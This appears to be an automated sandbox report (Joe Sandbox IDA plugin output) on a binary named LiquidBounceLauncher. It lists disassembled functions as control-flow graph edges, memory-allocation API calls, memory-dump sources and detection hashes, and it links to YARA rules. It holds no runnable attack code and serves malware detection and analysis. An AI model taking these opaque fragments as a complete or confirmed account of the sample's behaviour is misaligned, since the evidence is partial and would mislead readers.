                                                                                                                                                                                      control_flow_graph 589 41f990-41f9a0 590 41fc90-41fc9c call 4012a0 589->590 591 41f9a6-41f9f9 GetCommandLineA strlen call 420510 589->591 596 41fa00-41fa0b 591->596 597 41fa80-41fa82 596->597 598 41fa0d-41fa10 596->598 599 41fd21 597->599 600 41fa88-41fa8a 597->600 601 41fba3-41fba8 598->601 602 41fa16 598->602 613 41fd28 599->613 607 41fa90-41fa99 600->607 605 41fcfc-41fd0c 601->605 606 41fbae-41fbbe 601->606 603 41fad0-41fad3 602->603 604 41fa1c-41fa1f 602->604 608 41fbc3-41fbc7 603->608 609 41fad9-41fadc 603->609 610 41fbd5-41fbdc 604->610 611 41fa25-41fa28 604->611 617 41fd13 605->617 612 41fb00-41fb09 606->612 607->607 614 41fa9b-41fa9e 607->614 619 41fcb1-41fcb7 608->619 620 41fbcd-41fbd0 608->620 609->601 615 41fae2-41fae5 609->615 621 41fb40-41fb45 610->621 622 41fbe2-41fbe6 610->622 611->601 616 41fa2e-41fa31 611->616 618 41fb10-41fb19 612->618 623 41fc62-41fc86 call 428ca0 614->623 624 41faa4-41faa9 614->624 615->621 625 41fae7-41faee 615->625 616->621 626 41fa37-41fa3b 616->626 634 41fd1a 617->634 618->618 628 41fb1b-41fb1d 618->628 619->596 620->596 621->617 630 41fb4b-41fb4c 621->630 622->613 629 41fbec-41fbee 622->629 623->590 624->623 631 41faaf-41fac9 624->631 625->601 632 41faf4-41fafe 625->632 633 41fa41 626->633 626->634 636 41fb30 628->636 637 41fb1f-41fb26 628->637 638 41fbf0-41fbf9 629->638 639 41fb50-41fb59 630->639 632->612 640 41fb32-41fb38 632->640 641 41fa43-41fa4c 633->641 634->599 636->640 637->596 638->638 642 41fbfb-41fbff 638->642 639->639 643 41fb5b-41fb60 639->643 640->637 641->641 644 41fa4e-41fa52 641->644 645 41fc05-41fc07 642->645 646 41fc9d-41fcac 642->646 647 41fb62-41fb6a 643->647 648 41fb97-41fb9e 643->648 651 41fc21-41fc30 644->651 652 41fa58-41fa5a 644->652 645->646 653 41fc0d-41fc1c 645->653 646->596 649 41fb70-41fb85 _isctype 647->649 650 41fc35-41fc40 647->650 648->596 654 41fc46-41fc49 649->654 655 41fb8b 649->655 650->654 656 41fb8e-41fb91 650->656 651->596 652->651 657 41fa60-41fa7a 652->657 653->596 658 41fcc0-41fcdf call 428ca0 654->658 659 41fc4b-41fc50 654->659 655->656 656->648 656->654 657->598 660 41fa7c 657->660 663 41fce4-41fcf7 658->663 659->658 661 41fc52-41fc5d 659->661 660->597 661->596 663->596
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CommandLinestrlen
                                                                                                                                                                                      • String ID: "$'$'$*$?$@$[$\
                                                                                                                                                                                      • API String ID: 3702654222-871974141
                                                                                                                                                                                      • Opcode ID: 105a95b29d846ec3404f67ebf71782637941d453847fe74b4e75bf1032727fb0
                                                                                                                                                                                      • Instruction ID: 33fe16341fa15a5173a8980d3e401d5a92827c079e4bed21376c3d12b3963305
                                                                                                                                                                                      • Opcode Fuzzy Hash: 105a95b29d846ec3404f67ebf71782637941d453847fe74b4e75bf1032727fb0
                                                                                                                                                                                      • Instruction Fuzzy Hash: 42A1D030A092098FDB14CF68D8543EEB7E1BF54344F18857BD80AD7341E77DA88A8B99
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 0040B530 Relevance: 9.9, APIs: 3, Strings: 1, Instructions: 3859memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 696 40b530-40b551 call 406220 699 40b553-40b577 VirtualAlloc 696->699 700 40b57a-40bb9d 696->700 699->700 701 40bbab-40bbfa 700->701 702 40bb9f-40bba5 700->702 703 40bc0c-40bc80 701->703 704 40bbfc-40bc06 701->704 702->701 705 40bc82-40bc8e 703->705 706 40bc94-40bcdf 703->706 704->703 705->706 707 40bcf0-40bd60 706->707 708 40bce1-40bcea 706->708 709 40bd62-40bd6e 707->709 710 40bd74-40bdba 707->710 708->707 709->710 711 40bdc5-40be1f 710->711 712 40bdbc-40bdc2 710->712 713 40be30-40be3c 711->713 714 40be21-40be2a 711->714 712->711 715 40be4a-40bf23 713->715 716 40be3e-40be44 713->716 714->713 717 40bf33-40bf71 715->717 718 40bf25-40bf2d 715->718 716->715 719 40bf83-40bfbc 717->719 720 40bf73-40bf7d 717->720 718->717 721 40bfcd-40c00b 719->721 722 40bfbe-40bfc7 719->722 720->719 723 40c019-40c03b 721->723 724 40c00d-40c013 721->724 722->721 725 40c03d-40c049 723->725 726 40c04f-40c067 723->726 724->723 725->726 727 40c075-40c07e 726->727 728 40c069-40c06f 726->728 729 40c080-40c089 727->729 730 40c08c-40c10a 727->730 728->727 729->730 731 40c115-40c16f 730->731 732 40c10c-40c112 730->732 733 40c171-40c17d 731->733 734 40c183-40c18f 731->734 732->731 733->734 735 40c191-40c197 734->735 736 40c19d-40c1a3 734->736 735->736 737 40c1b1-40c1e2 736->737 738 40c1a5-40c1ae 736->738 739 40c1f3-40c21d 737->739 740 40c1e4-40c1f0 737->740 738->737 741 40c232-40c78a 739->741 742 40c21f-40c22c 739->742 740->739 743 40c790-40ce00 741->743 744 40d56a-40d57b 741->744 742->741 747 40ce02-40ce07 743->747 748 40ce0d-40cefe 743->748 745 40d5a4-40dd65 744->745 746 40d57d-40d5a1 VirtualAlloc 744->746 749 40dd73-40de02 745->749 750 40dd67-40dd6d 745->750 746->745 747->748 751 40cf00-40cf09 748->751 752 40cf0f-40cf3d 748->752 753 40de13-40de9f 749->753 754 40de04-40de0d 749->754 750->749 751->752 755 40cf48-40cf77 752->755 756 40cf3f-40cf42 752->756 759 40dea1-40dea7 753->759 760 40deaa-40df24 753->760 754->753 757 40cf82-40cfd8 755->757 758 40cf79-40cf7c 755->758 756->755 763 40cfe6-40cff8 757->763 764 40cfda-40cfe3 757->764 758->757 759->760 761 40df26-40df33 760->761 762 40df39-40df55 760->762 761->762 765 40df62-40df84 762->765 766 40df57-40df5c 762->766 767 40cffa-40d006 763->767 768 40d00c-40d564 763->768 764->763 769 40df86-40df92 765->769 770 40df98-40e4cf 765->770 766->765 767->768 768->744 769->770 771 40e4d1-40e4f5 VirtualAlloc 770->771 772 40e4f8-40ebca 770->772 771->772 773 40ebd8-40ecc4 772->773 774 40ebcc-40ebd2 772->774 775 40ecc6-40ecd4 773->775 776 40ecda-40ecef 773->776 774->773 775->776 777 40ecf1-40ecf9 776->777 778 40ecff-40ed1d 776->778 777->778 779 40ed2b-40ee56 778->779 780 40ed1f-40ed25 778->780 781 40ee67-40ee8b 779->781 782 40ee58-40ee61 779->782 780->779 783 40ee98-40eef5 781->783 784 40ee8d-40ee95 781->784 782->781 785 40eef7-40eefa 783->785 786 40eefd-40ef90 783->786 784->783 785->786 787 40ef92-40ef9e 786->787 788 40efa4-40efd5 786->788 787->788 789 40efe3-40f50b 788->789 790 40efd7-40efdd 788->790 791 4104f1-4104fb 789->791 792 40f511-40fb51 789->792 790->789 793 40fb53-40fb59 792->793 794 40fb5f-40fb87 792->794 793->794 795 40fb95-40fbad 794->795 796 40fb89-40fb8f 794->796 797 40fbbb-40fc2d 795->797 798 40fbaf-40fbb5 795->798 796->795 799 40fc3b-40fca9 797->799 800 40fc2f-40fc38 797->800 798->797 801 40fcb4-40fd4d 799->801 802 40fcab-40fcae 799->802 800->799 803 40fd5b-40fd79 801->803 804 40fd4f-40fd58 801->804 802->801 805 40fd7b-40fd87 803->805 806 40fd8d-40fdbe 803->806 804->803 805->806 807 40fdc0-40fdc3 806->807 808 40fdca-40fddf 806->808 807->808 809 40fde1-40fde6 808->809 810 40fdec-40fecf 808->810 809->810 811 40fed1-40fed7 810->811 812 40feda-40ff6b 810->812 811->812 813 40ff7c-40ff9d 812->813 814 40ff6d-40ff76 812->814 815 40ffae-4104ee 813->815 816 40ff9f-40ffa8 813->816 814->813 815->791 816->815
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00406220: VirtualAlloc.KERNEL32 ref: 00406262
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 0040B572
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 0040D59C
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 0040E4F0
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: 9
                                                                                                                                                                                      • API String ID: 4275171209-2366072709
                                                                                                                                                                                      • Opcode ID: e9d7f86be41f7146db87f9b8393bddefa5a30f58ce181cbb6b4970a87bb1f506
                                                                                                                                                                                      • Instruction ID: ba4e0493895bec4052748a53ed4468bab5e88d3334e5f7f1be5601ff20e62ebc
                                                                                                                                                                                      • Opcode Fuzzy Hash: e9d7f86be41f7146db87f9b8393bddefa5a30f58ce181cbb6b4970a87bb1f506
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97C34B76C01229CFCB65CF58CD86BC9B7B5BF48308F0941EAC949AB216D730AA95CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00401523 Relevance: 9.7, APIs: 3, Strings: 1, Instructions: 3700memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 817 401523-401546 call 4014ef 820 401548-40156c VirtualAlloc 817->820 821 40156f-401b89 817->821 820->821 822 401b94-401ba6 821->822 823 401b8b-401b91 821->823 824 401bb7-401c39 822->824 825 401ba8-401bb1 822->825 823->822 826 401c4a-401d5a 824->826 827 401c3b-401c44 824->827 825->824 828 401d6a-401e07 826->828 829 401d5c-401d64 826->829 827->826 830 401e09-401e15 828->830 831 401e1b-402358 828->831 829->828 830->831 832 4032c7-4032d6 831->832 833 40235e-402a06 831->833 834 4032d8-4032fc VirtualAlloc 832->834 835 4032ff-403904 832->835 836 402a18-402abd 833->836 837 402a08-402a15 833->837 834->835 838 403915-403979 835->838 839 403906-40390f 835->839 840 402ad1-402b96 836->840 841 402abf-402acb 836->841 837->836 844 403986-403a5b 838->844 845 40397b-403983 838->845 839->838 842 402ba4-402c1a 840->842 843 402b98-402b9e 840->843 841->840 846 402c2b-402c56 842->846 847 402c1c-402c25 842->847 843->842 848 403a5d-403a69 844->848 849 403a6f-403a7b 844->849 845->844 850 402c67-402c7f 846->850 851 402c58-402c64 846->851 847->846 848->849 852 403a8c-403bee 849->852 853 403a7d-403a86 849->853 854 402c81 850->854 855 402c87-402cc5 850->855 851->850 856 403bf0-403c00 852->856 857 403c06-403c4e 852->857 853->852 854->855 858 402cd6-402ce9 855->858 859 402cc7-402cd3 855->859 856->857 860 403c50-403c56 857->860 861 403c5c-403c87 857->861 862 402cf5-402d86 858->862 863 402ceb-402cee 858->863 859->858 860->861 864 403c89-403c96 861->864 865 403c9c-403ce9 861->865 868 402d88-402d94 862->868 869 402d9a-4032c4 862->869 863->862 864->865 866 403cf7-403d0c 865->866 867 403ceb-403cf1 865->867 870 403d1b-403d2d 866->870 871 403d0e-403d15 866->871 867->866 868->869 869->832 872 403d41-403d87 870->872 873 403d2f-403d3b 870->873 871->870 874 403d97-4042e4 872->874 875 403d89-403d91 872->875 873->872 876 4042e6-40430a VirtualAlloc 874->876 877 40430d-404937 874->877 875->874 876->877 878 404948-404979 877->878 879 404939-404945 877->879 880 40498a-404a2f 878->880 881 40497b-404987 878->881 879->878 882 404a31-404a37 880->882 883 404a3d-404ab5 880->883 881->880 882->883 884 404ab7 883->884 885 404abd-404ae2 883->885 884->885 886 404ae4-404af0 885->886 887 404af6-404b29 885->887 886->887 888 404b2b-404b37 887->888 889 404b3d-404c03 887->889 888->889 890 404c05-404c11 889->890 891 404c17-404c2c 889->891 890->891 892 404c40-404c49 891->892 893 404c2e-404c3a 891->893 894 404c4b-404c57 892->894 895 404c5d-404c78 892->895 893->892 894->895 896 404c89-404cc1 895->896 897 404c7a-404c86 895->897 898 404cc3-404cc9 896->898 899 404ccf-404dea 896->899 897->896 898->899 900 404dec-404df8 899->900 901 404dfe-404e29 899->901 900->901 902 404e37-404e49 901->902 903 404e2b-404e31 901->903 904 404e57-404e62 902->904 905 404e4b-404e51 902->905 903->902 906 404e64-404e70 904->906 907 404e76-404e9b 904->907 905->904 906->907 908 404ea6-404ec5 907->908 909 404e9d-404ea0 907->909 910 404ed0-404eec 908->910 911 404ec7-404eca 908->911 909->908 912 404efd-404f45 910->912 913 404eee-404efa 910->913 911->910 914 404f56-4054ae 912->914 915 404f47-404f50 912->915 913->912 916 4054b4-405b1d 914->916 917 406215-40621f 914->917 915->914 918 405b27-405b72 916->918 919 405b1f-405b25 916->919 920 405b74-405b79 918->920 921 405b7f-405ba4 918->921 919->918 920->921 922 405ba6-405bb2 921->922 923 405bb8-405cca 921->923 922->923 924 405ccc-405cd8 923->924 925 405cde-406212 923->925 924->925 925->917
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 004014EF: VirtualAlloc.KERNEL32 ref: 00401514
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00401567
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 004032F7
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00404305
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID: e
                                                                                                                                                                                      • API String ID: 4275171209-4024072794
                                                                                                                                                                                      • Opcode ID: 1686bb751d8797c67c7dfa96e60e523c2b8c0f014fc78577337159c913435d05
                                                                                                                                                                                      • Instruction ID: 3852847bf8b8a711e283e07606d874dec424b40ed669cdfc6d87afb2bf841857
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1686bb751d8797c67c7dfa96e60e523c2b8c0f014fc78577337159c913435d05
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AB31A76C01229CFCB65CF58CD85BC9B7B4BF48308F1942E6C949AB216D730AA99CF54
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00406220 Relevance: 7.7, APIs: 3, Instructions: 3982memoryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 00401523: VirtualAlloc.KERNEL32 ref: 00401567
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00406262
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 00407414
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 004082F5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                      • Opcode ID: 1d9b52bfa1c73871d6b4bf1ed95350231892ad86c93408a3612a8e81feb8f43f
                                                                                                                                                                                      • Instruction ID: 278303c8607aa7dcd6712979e57d7751477e0e785a25a00c650060b5eecf8d9d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d9b52bfa1c73871d6b4bf1ed95350231892ad86c93408a3612a8e81feb8f43f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 99C34A76C01229CFCB25CF58CD85BD9B7B5BF44308F0941EAC959AB206D730AA99CF94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004104FC Relevance: 6.3, APIs: 2, Instructions: 3756memoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1089 4104fc-41051d call 40b530 1092 410546-410c3f 1089->1092 1093 41051f-410543 VirtualAlloc 1089->1093 1094 410c41-410c4e 1092->1094 1095 410c54-410d17 1092->1095 1093->1092 1094->1095 1096 410d19-410d25 1095->1096 1097 410d28-410d3d 1095->1097 1096->1097 1098 410d3f-410d48 1097->1098 1099 410d4e-410d75 1097->1099 1098->1099 1100 410d77-410d84 1099->1100 1101 410d8a-410db6 1099->1101 1100->1101 1102 410dc1-410e45 1101->1102 1103 410db8-410dbb 1101->1103 1104 410e47-410e50 1102->1104 1105 410e56-410e6b 1102->1105 1103->1102 1104->1105 1106 410e7b-410e99 1105->1106 1107 410e6d-410e75 1105->1107 1108 410e9b-410ea8 1106->1108 1109 410eae-410f5c 1106->1109 1107->1106 1108->1109 1110 410f6c-410fb3 1109->1110 1111 410f5e-410f66 1109->1111 1112 410fb5-410fc2 1110->1112 1113 410fc8-41101c 1110->1113 1111->1110 1112->1113 1114 41102d-4110b1 1113->1114 1115 41101e-411027 1113->1115 1116 4110b3-4110c0 1114->1116 1117 4110c6-4110f1 1114->1117 1115->1114 1116->1117 1118 4110f3-4110f6 1117->1118 1119 4110fc-41115c 1117->1119 1118->1119 1120 41116d-4116c8 1119->1120 1121 41115e-411167 1119->1121 1122 412583-412594 1120->1122 1123 4116ce-411e5b 1120->1123 1121->1120 1124 412596-4125ba VirtualAlloc 1122->1124 1125 4125bd-412cb8 1122->1125 1126 411e69-411f08 1123->1126 1127 411e5d-411e63 1123->1127 1124->1125 1130 412cc9-412e50 1125->1130 1131 412cba-412cc6 1125->1131 1128 411f1b-411f78 1126->1128 1129 411f0a-411f15 1126->1129 1127->1126 1132 411f86-41204a 1128->1132 1133 411f7a-411f80 1128->1133 1129->1128 1134 412e52-412e58 1130->1134 1135 412e5e-412ead 1130->1135 1131->1130 1136 412057-412580 1132->1136 1137 41204c-412051 1132->1137 1133->1132 1134->1135 1138 412ec1-412f34 1135->1138 1139 412eaf-412ebb 1135->1139 1136->1122 1137->1136 1140 412f36-412f43 1138->1140 1141 412f49-412fb4 1138->1141 1139->1138 1140->1141 1142 412fb6-412fbc 1141->1142 1143 412fbf-412fd7 1141->1143 1142->1143 1144 412fd9-412fe5 1143->1144 1145 412feb-413048 1143->1145 1144->1145 1146 413053-41306e 1145->1146 1147 41304a-413050 1145->1147 1148 413070-413076 1146->1148 1149 41307c-4135d3 1146->1149 1147->1146 1148->1149 1150 4135d9-413be3 1149->1150 1151 414468-414473 1149->1151 1154 413be5-413bee 1150->1154 1155 413bf4-413c91 1150->1155 1152 414479-414ad6 1151->1152 1153 4153cc-4153d3 1151->1153 1156 414ad8-414ae4 1152->1156 1157 414aea-414c64 1152->1157 1154->1155 1158 413c93-413c99 1155->1158 1159 413c9f-413db5 1155->1159 1156->1157 1160 414c66-414c72 1157->1160 1161 414c78-414cee 1157->1161 1158->1159 1162 413db7 1159->1162 1163 413dbd-413eb9 1159->1163 1160->1161 1166 414cf0-414cfc 1161->1166 1167 414d02-414d20 1161->1167 1162->1163 1164 413ed0-413f0f 1163->1164 1165 413ebb-413eca 1163->1165 1168 413f11-413f17 1164->1168 1169 413f1d-414462 1164->1169 1165->1164 1166->1167 1170 414d22-414d2c 1167->1170 1171 414d2f-414d5a 1167->1171 1168->1169 1169->1151 1170->1171 1172 414d65-414d7f 1171->1172 1173 414d5c-414d5f 1171->1173 1174 414d81-414d8a 1172->1174 1175 414d90-414db8 1172->1175 1173->1172 1174->1175 1176 414dc5-414e5e 1175->1176 1177 414dba-414dbf 1175->1177 1178 414e60-414e69 1176->1178 1179 414e6f-4153c9 1176->1179 1177->1176 1178->1179 1179->1153
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0040B530: VirtualAlloc.KERNEL32 ref: 0040B572
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 0041053E
                                                                                                                                                                                      • VirtualAlloc.KERNEL32 ref: 004125B5
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                      • Opcode ID: fc9a51b0c569f565a8ff17d582a2ee32720c833643ec996dd0b43228e9137f2a
                                                                                                                                                                                      • Instruction ID: 11b65ec24569eb4c9cc2284099ce90b43514f369822d840e19eee0ce3e4c3aa2
                                                                                                                                                                                      • Opcode Fuzzy Hash: fc9a51b0c569f565a8ff17d582a2ee32720c833643ec996dd0b43228e9137f2a
                                                                                                                                                                                      • Instruction Fuzzy Hash: E1C34976C012298FCB25CF58CD85BD9B7B5BF54308F0942EAC959BB212D7306A99CF84
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 00428CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1180 428ca0-428cb4 1181 428cb6-428cbc 1180->1181 1182 428cbe-428cc4 1180->1182 1181->1182 1183 428cf3-428cfa 1181->1183 1184 428cd3-428cdd call 428410 1182->1184 1185 428cc6-428ccd call 427e10 1182->1185 1183->1182 1189 428ce2-428ce7 1184->1189 1185->1184 1190 428d00-428d03 1189->1190 1191 428ce9-428cf2 1189->1191 1190->1191 1192 428d05-428d2c strlen call 420510 1190->1192 1195 428d3d-428d42 1192->1195 1196 428d30-428d3b 1195->1196 1197 428d44-428d56 1195->1197 1196->1195 1198 428d58-428d6b _strdup 1196->1198 1197->1195 1197->1198 1198->1191 1199 428d71-428d7e call 428360 1198->1199 1199->1191
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.284466441.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.284454318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285108215.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285263978.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285283830.00000000004D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285360325.00000000004D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.285577342.000000000051A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_LiquidBounceLauncher.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: glob-1.0-mingw32
                                                                                                                                                                                      • API String ID: 0-3253302226
                                                                                                                                                                                      • Opcode ID: d20add9571a7a277cff5deac3d6e0922ab8589fbc41e0f727311286c883894c6
                                                                                                                                                                                      • Instruction ID: 197023689004b2c4f9d1c86f959907172bd9b551d0e140010a7a3780fc2e10a3
                                                                                                                                                                                      • Opcode Fuzzy Hash: d20add9571a7a277cff5deac3d6e0922ab8589fbc41e0f727311286c883894c6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9621B5B1F062248BCB149F6AA8412AFB7B1FF94304F94445FD841A7342DB3DA805CBA9
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Function 004AF900 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
